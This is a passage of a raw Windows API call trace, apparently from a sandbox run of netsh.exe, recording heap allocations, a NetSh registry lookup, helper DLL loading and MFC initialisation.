Flags=0x0, Size=0x10) returned 0x2d16d0 [0126.870] GetProcessHeap () returned 0x2b0000 [0126.870] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x10) returned 0x2d16f0 [0126.870] GetProcessHeap () returned 0x2b0000 [0126.870] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x10) returned 0x2d1710 [0126.870] GetProcessHeap () returned 0x2b0000 [0126.870] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x10) returned 0x2d1730 [0126.870] GetProcessHeap () returned 0x2b0000 [0126.870] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x10) returned 0x2d1750 [0126.870] GetProcessHeap () returned 0x2b0000 [0126.870] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x10) returned 0x2d1770 [0126.870] GetProcessHeap () returned 0x2b0000 [0126.870] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x10) returned 0x2d1790 [0126.870] GetProcessHeap () returned 0x2b0000 [0126.870] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x10) returned 0x2d17b0 [0126.870] GetProcessHeap () returned 0x2b0000 [0126.870] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x10) returned 0x2d17d0 [0126.870] GetProcessHeap () returned 0x2b0000 [0126.870] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x10) returned 0x2d17f0 [0126.870] GetProcessHeap () returned 0x2b0000 [0126.870] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x10) returned 0x2d1810 [0126.870] GetProcessHeap () returned 0x2b0000 [0126.870] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x10) returned 0x2d1830 [0126.870] GetProcessHeap () returned 0x2b0000 [0126.870] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x10) returned 0x2d1890 [0126.871] GetProcessHeap () returned 0x2b0000 [0126.871] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x10) returned 0x2d18b0 [0126.871] GetProcessHeap () returned 0x2b0000 [0126.871] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x10) returned 0x2d18d0 [0126.871] GetProcessHeap () returned 0x2b0000 [0126.871] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x10) returned 0x2d18f0 [0126.871] GetProcessHeap () returned 0x2b0000 [0126.871] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x10) returned 0x2d1910 [0126.871] GetProcessHeap () returned 0x2b0000 [0126.871] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x10) returned 0x2d1930 [0126.871] GetProcessHeap () returned 0x2b0000 [0126.871] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x10) returned 0x2d1950 [0126.871] GetProcessHeap () returned 0x2b0000 [0126.871] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x10) returned 0x2d1970 [0126.871] GetProcessHeap () returned 0x2b0000 [0126.871] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x10) returned 0x2d1990 [0126.871] GetProcessHeap () returned 0x2b0000 [0126.871] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x10) returned 0x2d19b0 [0126.871] GetProcessHeap () returned 0x2b0000 [0126.871] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x10) returned 0x2d19d0 [0126.871] GetProcessHeap () returned 0x2b0000 [0126.871] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x10) returned 0x2d19f0 [0126.871] GetProcessHeap () returned 0x2b0000 [0126.871] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x10) returned 0x2d1a10 [0126.871] GetProcessHeap () returned 0x2b0000 [0126.871] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x10) returned 0x2d1a30 [0126.871] GetProcessHeap () returned 0x2b0000 [0126.871] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x10) returned 0x2d1a50 [0126.871] GetProcessHeap () returned 0x2b0000 [0126.871] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x10) returned 0x2d1a70 [0126.871] GetProcessHeap () returned 0x2b0000 [0126.871] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x10) returned 0x2d1a90 [0126.871] GetProcessHeap () returned 0x2b0000 [0126.871] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x10) returned 0x2d1ab0 [0126.871] GetProcessHeap () returned 0x2b0000 [0126.871] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x10) returned 0x2d1ad0 [0126.871] GetProcessHeap () returned 0x2b0000 [0126.871] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x10) returned 0x2d1af0 [0126.871] GetProcessHeap () returned 0x2b0000 [0126.871] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x10) returned 0x2d1b10 [0126.871] GetProcessHeap () returned 0x2b0000 [0126.871] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x10) returned 0x2d1b30 [0126.871] GetProcessHeap () returned 0x2b0000 [0126.871] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x10) returned 0x2d1b50 [0126.872] GetProcessHeap () returned 0x2b0000 [0126.872] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x10) returned 0x2d1b70 [0126.872] GetProcessHeap () returned 0x2b0000 [0126.872] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x10) returned 0x2d1b90 [0126.872] GetProcessHeap () returned 0x2b0000 [0126.872] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x10) returned 0x2d1bb0 [0126.872] GetProcessHeap () returned 0x2b0000 [0126.872] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x10) returned 0x2d1bd0 [0126.872] GetProcessHeap () returned 0x2b0000 [0126.872] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x10) returned 0x2d1bf0 [0126.872] GetProcessHeap () returned 0x2b0000 [0126.872] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x10) returned 0x2d1c10 [0126.872] GetProcessHeap () returned 0x2b0000 [0126.872] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x10) returned 0x2d1c30 [0126.872] GetProcessHeap () returned 0x2b0000 [0126.872] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x10) returned 0x2d1c50 [0126.872] GetProcessHeap () returned 0x2b0000 [0126.872] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x10) returned 0x2d1c70 [0126.872] GetProcessHeap () returned 0x2b0000 [0126.872] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x10) returned 0x2d1c90 [0126.872] GetProcessHeap () returned 0x2b0000 [0126.872] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x10) returned 0x2d1cb0 [0126.872] GetProcessHeap () returned 0x2b0000 [0126.872] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x10) returned 0x2d1cd0 [0126.872] GetProcessHeap () returned 0x2b0000 [0126.872] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x10) returned 0x2d1cf0 [0126.872] GetProcessHeap () returned 0x2b0000 [0126.872] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x10) returned 0x2d1d10 [0126.872] GetProcessHeap () returned 0x2b0000 [0126.872] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x10) returned 0x2d1d30 [0126.872] GetProcessHeap () returned 0x2b0000 [0126.872] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x10) returned 0x2d1d50 [0126.872] GetProcessHeap () returned 0x2b0000 [0126.872] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x10) returned 0x2d1d70 [0126.872] GetProcessHeap () returned 0x2b0000 [0126.872] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x10) returned 0x2d1d90 [0126.872] GetProcessHeap () returned 0x2b0000 [0126.872] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x10) returned 0x2d1db0 [0126.872] GetProcessHeap () returned 0x2b0000 [0126.872] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x10) returned 0x2d1dd0 [0126.872] GetProcessHeap () returned 0x2b0000 [0126.872] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x10) returned 0x2d1df0 [0126.872] GetProcessHeap () returned 0x2b0000 [0126.873] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x10) returned 0x2d1e10 [0126.873] GetProcessHeap () returned 0x2b0000 [0126.873] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x10) returned 0x2d1e30 [0126.873] GetProcessHeap () returned 0x2b0000 [0126.873] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x10) returned 0x2d1e50 [0126.873] GetProcessHeap () returned 0x2b0000 [0126.873] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x10) returned 0x2d1e70 [0126.873] GetProcessHeap () returned 0x2b0000 [0126.873] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x10) returned 0x2d1e90 [0126.873] GetProcessHeap () returned 0x2b0000 [0126.873] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x10) returned 0x2d1eb0 [0126.873] GetProcessHeap () returned 0x2b0000 [0126.873] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x10) returned 0x2d1ed0 [0126.873] GetProcessHeap () returned 0x2b0000 [0126.873] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x10) returned 0x2d1ef0 [0126.873] GetProcessHeap () returned 0x2b0000 [0126.873] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x10) returned 0x2d1f10 [0126.873] GetProcessHeap () returned 0x2b0000 [0126.873] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x10) returned 0x2d1f30 [0126.873] GetProcessHeap () returned 0x2b0000 [0126.873] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x10) returned 0x2d1f50 [0126.873] GetProcessHeap () returned 0x2b0000 [0126.873] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x10) returned 0x2d1f70 [0126.873] GetProcessHeap () returned 0x2b0000 [0126.873] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x10) returned 0x2d1f90 [0126.873] GetProcessHeap () returned 0x2b0000 [0126.873] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x10) returned 0x2d1fb0 [0126.873] GetProcessHeap () returned 0x2b0000 [0126.873] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x10) returned 0x2d1fd0 [0126.873] GetProcessHeap () returned 0x2b0000 [0126.873] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x10) returned 0x2d1ff0 [0126.873] GetProcessHeap () returned 0x2b0000 [0126.873] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x10) returned 0x2d2010 [0126.873] GetProcessHeap () returned 0x2b0000 [0126.873] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x10) returned 0x2d2030 [0126.873] GetProcessHeap () returned 0x2b0000 [0126.873] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x10) returned 0x2d2090 [0126.873] GetProcessHeap () returned 0x2b0000 [0126.873] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x10) returned 0x2d20b0 [0126.874] GetProcessHeap () returned 0x2b0000 [0126.874] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x10) returned 0x2d20d0 [0126.874] GetProcessHeap () returned 0x2b0000 [0126.874] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x10) returned 0x2d20f0 [0126.874] GetProcessHeap () returned 0x2b0000 [0126.874] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x10) returned 0x2d2110 [0126.874] GetProcessHeap () returned 0x2b0000 [0126.874] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x10) returned 0x2d2130 [0126.874] GetProcessHeap () returned 0x2b0000 [0126.874] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x10) returned 0x2d2150 [0126.874] GetProcessHeap () returned 0x2b0000 [0126.874] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x10) returned 0x2d2170 [0126.874] GetProcessHeap () returned 0x2b0000 [0126.874] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x10) returned 0x2d2190 [0126.874] GetProcessHeap () returned 0x2b0000 [0126.874] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x10) returned 0x2d21b0 [0126.874] GetProcessHeap () returned 0x2b0000 [0126.874] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x10) returned 0x2d21d0 [0126.874] GetProcessHeap () returned 0x2b0000 [0126.874] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x10) returned 0x2d21f0 [0126.874] GetProcessHeap () returned 0x2b0000 [0126.874] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x10) returned 0x2d2210 [0126.874] GetProcessHeap () returned 0x2b0000 [0126.874] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x10) returned 0x2d2230 [0126.874] GetProcessHeap () returned 0x2b0000 [0126.874] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x10) returned 0x2d2250 [0126.874] GetProcessHeap () returned 0x2b0000 [0126.874] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x10) returned 0x2d2270 [0126.874] GetProcessHeap () returned 0x2b0000 [0126.874] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x10) returned 0x2d2290 [0126.874] GetProcessHeap () returned 0x2b0000 [0126.874] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x10) returned 0x2d22b0 [0126.874] GetProcessHeap () returned 0x2b0000 [0126.874] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x10) returned 0x2d22d0 [0126.874] _wcsicmp (_String1="netsh.exe", _String2="ipxmontr.dll") returned 5 [0126.874] _wcsicmp (_String1="netsh.exe", _String2="ipxpromn.dll") returned 5 [0126.874] GetProcessHeap () returned 0x2b0000 [0126.874] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x28) returned 0x2ce030 [0126.875] GetProcessHeap () returned 0x2b0000 [0126.875] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x2) returned 0x2d2860 [0126.875] GetProcessHeap () returned 0x2b0000 [0126.875] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x14) returned 0x2d22f0 [0126.875] _wcsupr (in: _String="netsh.exe" | out: _String="NETSH.EXE") returned="NETSH.EXE" [0126.875] GetProcessHeap () returned 0x2b0000 [0126.875] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x2b0000) returned 1 [0126.875] GetProcessHeap () returned 0x2b0000 [0126.875] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x58) returned 0x2d2880 [0126.875] GetProcessHeap () returned 0x2b0000 [0126.875] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x2b0000) returned 1 [0126.875] GetProcessHeap () returned 0x2b0000 [0126.875] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0xb0) returned 0x2d28e0 [0126.875] GetProcessHeap () returned 0x2b0000 [0126.875] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2880 | out: hHeap=0x2b0000) returned 1 [0126.875] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Microsoft\\NetSh", ulOptions=0x0, samDesired=0x20019, phkResult=0x1a73a8 | out: phkResult=0x1a73a8*=0x90) returned 0x0 [0126.875] RegQueryInfoKeyW (in: hKey=0x90, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x0, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1a73d0, lpcbMaxValueNameLen=0x1a73e0, lpcbMaxValueLen=0x1a73d8, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x0, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1a73d0*=0x15, lpcbMaxValueNameLen=0x1a73e0, lpcbMaxValueLen=0x1a73d8, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0 [0126.875] GetProcessHeap () returned 0x2b0000 [0126.875] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x16) returned 0x2d2310 [0126.875] GetProcessHeap () returned 0x2b0000 [0126.875] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x23) returned 0x2ce060 [0126.875] RegEnumValueW (in: hKey=0x90, dwIndex=0x0, lpValueName=0x2d2310, lpcchValueName=0x1a73a0, lpReserved=0x0, lpType=0x0, lpData=0x2ce060, lpcbData=0x1a73e8 | out: lpValueName="4", lpcchValueName=0x1a73a0, lpType=0x0, lpData=0x2ce060, lpcbData=0x1a73e8) returned 0x0 [0126.875] _wcsicmp (_String1="rasmontr.dll", _String2="ipxmontr.dll") returned 9 [0126.876] _wcsicmp (_String1="rasmontr.dll", _String2="ipxpromn.dll") returned 9 [0126.876] GetProcessHeap () returned 0x2b0000 [0126.876] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x50) returned 0x2d2880 [0126.876] GetProcessHeap () returned 0x2b0000 [0126.876] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x4) returned 0x2d29a0 [0126.876] GetProcessHeap () returned 0x2b0000 [0126.876] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x1a) returned 0x2ce090 [0126.876] _wcsupr (in: _String="rasmontr.dll" | out: _String="RASMONTR.DLL") returned="RASMONTR.DLL" [0126.876] GetProcessHeap () returned 0x2b0000 [0126.876] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2ce030 | out: hHeap=0x2b0000) returned 1 [0126.876] LoadLibraryW (lpLibFileName="RASMONTR.DLL") returned 0x7fef2f70000 [0133.534] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x1a6da0 | out: lpSystemTimeAsFileTime=0x1a6da0*(dwLowDateTime=0xe7f5020, dwHighDateTime=0x1d68bad)) [0133.534] GetCurrentProcessId () returned 0xb2c [0133.534] GetCurrentThreadId () returned 0xb30 [0133.534] GetTickCount () returned 0x1155725 [0133.534] RtlQueryPerformanceCounter (in: lpPerformanceCount=0x1a6da8 | out: lpPerformanceCount=0x1a6da8*=25381009070) returned 1 [0133.534] LoadLibraryA (lpLibFileName=0x7fef2f10318) returned 0x7fefdee0000 [0133.535] GetVersion () returned 0x1db10106 [0133.535] SetErrorMode (uMode=0x0) returned 0x0 [0133.535] SetErrorMode (uMode=0x8001) returned 0x0 [0133.535] LocalAlloc (uFlags=0x0, uBytes=0x2000) returned 0x2d4330 [0133.535] LocalFree (hMem=0x2d4330) returned 0x0 [0133.535] GetVersion () returned 0x1db10106 [0133.536] GlobalLock (hMem=0x9d0008) returned 0x2d4330 [0133.536] LocalAlloc (uFlags=0x40, uBytes=0x340) returned 0x2d4550 [0133.536] LocalAlloc (uFlags=0x40, uBytes=0x20) returned 0x2d3050 [0133.537] LocalAlloc (uFlags=0x0, uBytes=0x10) returned 0x2d2330 [0133.537] malloc (_Size=0x100) returned 0x297bd0 [0133.537] __dllonexit () returned 0x7fef2ed621c [0133.537] __dllonexit () returned 0x7fef2ed66e0 [0133.537] __dllonexit () returned 0x7fef2ed72b8 [0133.537] __dllonexit () returned 0x7fef2ed87cc [0133.537] __dllonexit () returned 0x7fef2ed8d64 [0133.537] __dllonexit () returned 0x7fef2ed8db4 [0133.538] __dllonexit () returned 0x7fef2ed8e70 [0133.538] __dllonexit () returned 0x7fef2eda308 [0133.538] __dllonexit () returned 0x7fef2ed8810 [0133.538] __dllonexit () returned 0x7fef2ee7598 [0133.538] __dllonexit () returned 0x7fef2ed8880 [0133.539] __dllonexit () returned 0x7fef2eda170 [0133.539] __dllonexit () returned 0x7fef2eda280 [0133.539] __dllonexit () returned 0x7fef2edad44 [0133.539] __dllonexit () returned 0x7fef2edbc30 [0133.539] __dllonexit () returned 0x7fef2edbc80 [0133.539] __dllonexit () returned 0x7fef2edc338 [0133.539] __dllonexit () returned 0x7fef2edd030 [0133.539] __dllonexit () returned 0x7fef2ed59cc [0133.539] __dllonexit () returned 0x7fef2ed59f0 [0133.539] __dllonexit () returned 0x7fef2ed5a1c [0133.541] RegisterClipboardFormatW (lpszFormat="commctrl_DragListMsg") returned 0xc0fc [0133.541] __dllonexit () returned 0x7fef2ee7568 [0133.542] __dllonexit () returned 0x7fef2ee7574 [0133.542] __dllonexit () returned 0x7fef2ee7580 [0133.542] __dllonexit () returned 0x7fef2ee758c [0133.542] GetVersion () returned 0x1db10106 [0133.542] GetVersion () returned 0x1db10106 [0133.542] GetVersion () returned 0x1db10106 [0133.542] __dllonexit () returned 0x7fef2e3a15c [0133.543] __dllonexit () returned 0x7fef2e46610 [0133.543] __dllonexit () returned 0x7fef2ed8910 [0133.543] __dllonexit () returned 0x7fef2ed8b90 [0133.543] __dllonexit () returned 0x7fef2ed8bb4 [0133.543] __dllonexit () returned 0x7fef2e56ae0 [0133.543] GetVersion () returned 0x1db10106 [0133.543] GetProcessVersion (ProcessId=0x0) returned 0x60001 [0133.543] GetSystemMetrics (nIndex=11) returned 32 [0133.543] GetSystemMetrics (nIndex=12) returned 32 [0133.543] GetSystemMetrics (nIndex=2) returned 17 [0133.543] GetSystemMetrics (nIndex=3) returned 17 [0133.543] GetDC (hWnd=0x0) returned 0x50109ca [0133.543] GetDeviceCaps (hdc=0x50109ca, index=88) returned 96 [0133.544] GetDeviceCaps (hdc=0x50109ca, index=90) returned 96 [0133.544] ReleaseDC (hWnd=0x0, hDC=0x50109ca) returned 1 [0133.544] GetSysColor (nIndex=15) returned 0xf0f0f0 [0133.544] GetSysColor (nIndex=16) returned 0xa0a0a0 [0133.544] GetSysColor (nIndex=20) returned 0xffffff [0133.544] GetSysColor (nIndex=18) returned 0x0 [0133.544] GetSysColor (nIndex=6) returned 0x646464 [0133.544] GetSysColorBrush (nIndex=15) returned 0x1100059 [0133.544] GetSysColorBrush (nIndex=6) returned 0x1100061 [0133.544] LoadCursorW (hInstance=0x0, lpCursorName=0x7f02) returned 0x10007 [0133.544] LoadCursorW (hInstance=0x0, lpCursorName=0x7f00) returned 0x10003 [0133.544] __dllonexit () returned 0x7fef2ed8f84 [0133.544] RegisterClipboardFormatW (lpszFormat=0x7fef2efbd60) returned 0xc0fd [0133.544] __dllonexit () returned 0x7fef2e63990 [0133.544] RegisterClipboardFormatW (lpszFormat=0x7fef2effd18) returned 0xc004 [0133.544] RegisterClipboardFormatW (lpszFormat="OwnerLink") returned 0xc003 [0133.544] RegisterClipboardFormatW (lpszFormat="ObjectLink") returned 0xc002 [0133.544] RegisterClipboardFormatW (lpszFormat="Embedded Object") returned 0xc00a [0133.544] RegisterClipboardFormatW (lpszFormat="Embed Source") returned 0xc00b [0133.544] RegisterClipboardFormatW (lpszFormat="Link Source") returned 0xc00d [0133.544] RegisterClipboardFormatW (lpszFormat="Object Descriptor") returned 0xc00e [0133.545] RegisterClipboardFormatW (lpszFormat="Link Source Descriptor") returned 0xc00f [0133.545] RegisterClipboardFormatW (lpszFormat="FileName") returned 0xc006 [0133.545] RegisterClipboardFormatW (lpszFormat="FileNameW") returned 0xc007 [0133.545] RegisterClipboardFormatW (lpszFormat="Rich Text Format") returned 0xc0b1 [0133.545] RegisterClipboardFormatW (lpszFormat="RichEdit Text and Objects") returned 0xc0b7 [0133.545] RegisterClipboardFormatW (lpszFormat="commdlg_FindReplace") returned 0xc0fd [0133.545] __dllonexit () returned 0x7fef2ee75a4 [0133.545] __dllonexit () returned 0x7fef2ee75bc [0133.545] __dllonexit () returned 0x7fef2ee75c8 [0133.546] __dllonexit () returned 0x7fef2ee75d4 [0133.546] __dllonexit () returned 0x7fef2ee75e0 [0133.546] GetCursorPos (in: lpPoint=0x7fef2f426d8 | out: lpPoint=0x7fef2f426d8*(x=61, y=120)) returned 1 [0133.547] LocalAlloc (uFlags=0x40, uBytes=0x108) returned 0x2d48a0 [0133.547] LocalReAlloc (hMem=0x2d2330, uBytes=0x18, uFlags=0x2) returned 0x2d49b0 [0133.547] GetCurrentThread () returned 0xfffffffffffffffe [0133.547] GetCurrentThreadId () returned 0xb30 [0133.547] __dllonexit () returned 0x7fef2edcfa4 [0133.547] SetErrorMode (uMode=0x0) returned 0x8001 [0133.547] SetErrorMode (uMode=0x8001) returned 0x0 [0133.547] GetModuleFileNameW (in: hModule=0x7fef2e20000, lpFilename=0x1a6490, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\MFC42u.dll" (normalized: "c:\\windows\\system32\\mfc42u.dll")) returned 0x1e [0133.547] wcscpy_s (in: _Destination=0x1a66a0, _SizeInWords=0x104, _Source="MFC42u" | out: _Destination="MFC42u") returned 0x0 [0133.548] FindResourceW (hModule=0x7fef2e20000, lpName=0xe01, lpType=0x6) returned 0x2409b0 [0133.812] LoadStringW (in: hInstance=0x7fef2e20000, uID=0xe000, lpBuffer=0x1a68b0, cchBufferMax=256 | out: lpBuffer="") returned 0x0 [0133.812] wcscpy_s (in: _Destination=0x1a64c4, _SizeInWords=0x5, _Source=0x7fef2efe630 | out: _Destination=".HLP") returned 0x0 [0133.812] wcscat_s (in: _Destination="MFC42u", _SizeInWords=0x104, _Source=".INI" | out: _Destination="MFC42u.INI") returned 0x0 [0134.324] malloc (_Size=0x80) returned 0x297e00 [0134.325] LocalAlloc (uFlags=0x40, uBytes=0x2100) returned 0x2d49d0 [0134.325] GetSystemDirectoryA (in: lpBuffer=0x1a6b30, uSize=0x112 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0134.325] strcat_s (in: _Destination="C:\\Windows\\system32", _SizeInBytes=0x112, _Source="\\MFC42" | out: _Destination="C:\\Windows\\system32\\MFC42") returned 0x0 [0134.325] strcat_s (in: _Destination="C:\\Windows\\system32\\MFC42", _SizeInBytes=0x112, _Source="LOC" | out: _Destination="C:\\Windows\\system32\\MFC42LOC") returned 0x0 [0134.325] strcat_s (in: _Destination="C:\\Windows\\system32\\MFC42LOC", _SizeInBytes=0x112, _Source=".DLL" | out: _Destination="C:\\Windows\\system32\\MFC42LOC.DLL") returned 0x0 [0134.325] LoadLibraryExA (lpLibFileName="C:\\Windows\\system32\\MFC42LOC.DLL", hFile=0x0, dwFlags=0x2) returned 0x0 [0134.327] GetProcAddress (hModule=0x7fef2f70000, lpProcName="InitHelperDll") returned 0x7fef2f8cf70 [0134.327] InitHelperDll () returned 0x0 [0134.328] RegisterHelper () returned 0x0 [0134.328] GetProcessHeap () returned 0x2b0000 [0134.328] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x108) returned 0x2d6ae0 [0134.328] GetProcessHeap () returned 0x2b0000 [0134.328] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d28e0 | out: hHeap=0x2b0000) returned 1 [0134.328] RegisterHelper () returned 0x0 [0134.328] GetProcessHeap () returned 0x2b0000 [0134.328] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x160) returned 0x2d6bf0 [0134.328] GetProcessHeap () returned 0x2b0000 [0134.328] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d6ae0 | out: hHeap=0x2b0000) returned 1 [0134.328] RegisterHelper () returned 0x0 [0134.329] GetProcessHeap () returned 0x2b0000 [0134.329] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x1b8) returned 0x2d6d60 [0134.329] GetProcessHeap () returned 0x2b0000 [0134.329] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d6bf0 | out: hHeap=0x2b0000) returned 1 [0134.329] RegisterHelper () returned 0x0 [0134.329] GetProcessHeap () returned 0x2b0000 [0134.329] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x210) returned 0x2d6ae0 [0134.329] GetProcessHeap () returned 0x2b0000 [0134.329] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d6d60 | out: hHeap=0x2b0000) returned 1 [0134.329] RegisterHelper () returned 0x0 [0134.329] GetProcessHeap () returned 0x2b0000 [0134.329] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x268) returned 